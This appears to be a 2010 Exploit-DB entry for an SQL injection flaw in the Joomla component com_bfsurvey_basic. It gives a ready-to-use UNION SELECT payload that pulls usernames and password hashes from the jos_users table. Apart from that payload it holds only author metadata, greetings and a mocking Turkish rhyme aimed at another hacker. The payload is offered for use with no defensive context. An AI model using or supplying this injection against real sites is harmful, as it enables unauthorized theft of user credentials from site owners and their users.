Joomla! Component com_bfsurvey_basic - SQL Injection

EDB-ID:

10944

Author:

FL0RiX

Type:

webapps

Platform:

PHP

Published:

2010-01-03

[+] Joomla Component com_bfsurvey_basic SQL Injection Vulnerability

[+] Author: FL0RiX

[+] Greez  : Wretch-x And All Friends

[+] HomePage : http://oltan.org


############################################################################################################################

[+] Exploit;

     [+] null/**/and/**/1=0/**/union/**/select/**/concat(username,0x3a,password)fl0rix,user(),user()/**/from/**/jos_users--


############################################################################################################################
< ---- Note ---- >
F....N;
Sen çok üstün zekaya sahip birisin,
emin olabilirsin, :)
Sql injection ile domain hackleyebilen tek lamersin, :)
ASP'de Rfi Bulmakta Birebirsin,
Ama Gördügüm En hIyar Lamersin :D
Bu Kafiyelerde Bi TarafIna Girsin ;)
Lol F....N :)
< ---- Note Finished ---- >